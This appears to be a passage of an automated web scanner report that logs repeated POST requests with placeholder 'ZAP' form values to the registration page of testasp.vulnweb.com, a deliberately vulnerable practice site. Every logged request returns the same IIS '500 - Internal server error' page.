<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
